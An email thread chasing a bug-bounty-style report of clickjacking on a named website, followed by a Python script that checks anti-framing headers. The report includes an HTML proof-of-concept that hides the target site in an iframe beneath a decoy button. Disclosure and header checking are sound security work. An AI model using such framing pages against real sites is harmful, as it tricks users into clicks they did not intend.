Hello Team,
Please give me a response regarding this issue, please.
On Fri, Jul 8, 2022 at 2:42 AM Sakshi Patil <sakshipatil017(a)gmail.com>
wrote:
Hello Team,
Please give me a response regarding this issue, please.
On Tue, Apr 5, 2022 at 4:56 PM Sakshi Patil <sakshipatil017(a)gmail.com>
wrote:
> Hello Team,
> Please give me a response on this issue.
>
> On Tue, Mar 1, 2022 at 9:26 PM Sakshi Patil <sakshipatil017(a)gmail.com>
> wrote:
>
>> Sir, any update?
>>
>> On Sun, Nov 22, 2020 at 8:16 PM Sakshi Patil <sakshipatil017(a)gmail.com>
>> wrote:
>>
>>> *Vulnerability Name : Click jacking*
>>>
>>> Target URL: https://www.sparta.eu/
>>>
>>> Vulnerability Description :
>>> Click jacking (User Interface redress attack, UI redress attack, UI
>>> redressing) is a malicious technique of tricking a Web user into clicking
>>> on something different from what the user perceives they are clicking on,
>>> thus potentially revealing confidential information or taking control of
>>> their computer while clicking on seemingly innocuous web pages.
>>>
>>> The server didn't return an X-Frame-Options header which means that
>>> this website could be at risk of a click jacking attack. The
>>> X-Frame-Options HTTP response header can be used to indicate whether or not
>>> a browser should be allowed to render a page in a <frame> or <iframe>.
>>> Sites can use this to avoid click jacking attacks, by ensuring that their
>>> content is not embedded into other sites.
>>>
>>> Typically there is one type of attack - cross site request forgeries
>>> (CSRF) that can interact with functions on other websites.
>>>
>>> 1) This vulnerability affects Web Server.
>>> <html>
>>> <head>
>>> <title>Clickjack test page</title>
>>> </head>
>>> <style>
>>> #myBtn{
>>> z-index: 999;
>>> position: absolute;
>>> top: 100px;
>>> right: 50px;
>>> color: white;
>>> background-color: red;
>>> }
>>> </style>
>>> <body>
>>> <!-- <h1> A Sample Test Page </h1>
>>> <p>Website is vulnerable to click jacking! </p>
>>> <p>Avoid random clicks </p> -->
>>> <div style="z-index:-9999; position:absolute;top:0; left:0;width: 70%; height:70%">
>>> <iframe src="https://www.sparta.eu/" "frame1" width="100%" height="100%" >
>>> </iframe></div>
>>> <div align="right" style="position:absolute; top:1; left:0; z-index:1; width: 70%;height:60%; text-align:left;">
>>>
>>> <a href="https://www.sparta.eu/" target="_blank"><button id="myBtn"> click here</button></a>
>>> <!-- <a href="https://www.sparta.eu/"><button id="myBtn">Open Modal</button></a> -->
>>> <div id="myModal" class="modal">
>>> <!-- Modal content -->
>>> </div>
>>> </body>
>>> </html>
>>>
>>> 2. Save it as <any name>.html, e.g. s.html
>>>
>>> 3. Then simply open it and click on the button (direct login); it
>>> redirects to https://www.sparta.eu/
>>>
>>> As far as I know, this data is enough to prove that your site is
>>> vulnerable to click jacking.
>>>
>>> Impact:
>>> An attacker may trick a user by sending them a malicious link; the user
>>> opens it, clicks some image, and their account has unconsciously been deactivated.
>>>
>>> Attachment:
>>>
>>
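
For triaging a report like the one quoted above, a defender-side check of a response's anti-framing headers. This is an added example, not part of the original messages; it also covers the CSP `frame-ancestors` directive, which the report does not mention, and the function names and sample headers are constructed for illustration.

```python
"""Classify anti-framing response headers (added example; samples are constructed)."""

def _csp_frame_ancestors(csp_values):
    """Source list of the first frame-ancestors directive found, or None if absent.
    Simplification: with several CSP headers a browser enforces all of them."""
    for policy in csp_values:
        for directive in policy.split(";"):
            parts = directive.split()
            if parts and parts[0].lower() == "frame-ancestors":
                return [p.lower() for p in parts[1:]]
    return None

def framing_verdict(headers):
    """headers: list of (name, value) pairs as received, duplicates preserved.
    Returns (verdict, reason); verdict is 'protected', 'weak' or 'unprotected'."""
    xfo = {t.strip().upper() for n, v in headers if n.lower() == "x-frame-options"
           for t in v.split(",") if t.strip()}
    csp = [v for n, v in headers if n.lower() == "content-security-policy"]
    ancestors = _csp_frame_ancestors(csp)
    if ancestors is not None:
        # Browsers that support frame-ancestors enforce it and ignore X-Frame-Options.
        if any(s == "*" or s.endswith(":") for s in ancestors):
            return "weak", "frame-ancestors allows any origin or a whole scheme"
        return "protected", "CSP frame-ancestors " + " ".join(ancestors)
    if not xfo:
        return "unprotected", "no X-Frame-Options and no CSP frame-ancestors"
    if len(xfo) > 1:
        return "weak", "conflicting X-Frame-Options values; send exactly one"
    value = next(iter(xfo))
    if value in ("DENY", "SAMEORIGIN"):
        return "protected", "X-Frame-Options " + value
    if value.startswith("ALLOW-FROM"):
        return "weak", "ALLOW-FROM is obsolete and ignored by current browsers"
    return "unprotected", "unrecognised X-Frame-Options value " + value

# Constructed sample responses (not captured from any real site).
SAMPLES = {
    "missing": [("Content-Type", "text/html")],
    "sameorigin": [("X-Frame-Options", "SAMEORIGIN")],
    "allow_from": [("X-Frame-Options", "ALLOW-FROM https://partner.example")],
    "csp_wins": [("X-Frame-Options", "DENY"),
                 ("Content-Security-Policy", "default-src 'self'; frame-ancestors *")],
    "conflict": [("X-Frame-Options", "DENY"), ("X-Frame-Options", "SAMEORIGIN")],
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(f"{label:11s} -> {framing_verdict(hdrs)}")
```

The `csp_wins` sample shows why both headers must be read together: a permissive `frame-ancestors` takes effect in supporting browsers even when `X-Frame-Options: DENY` is also sent.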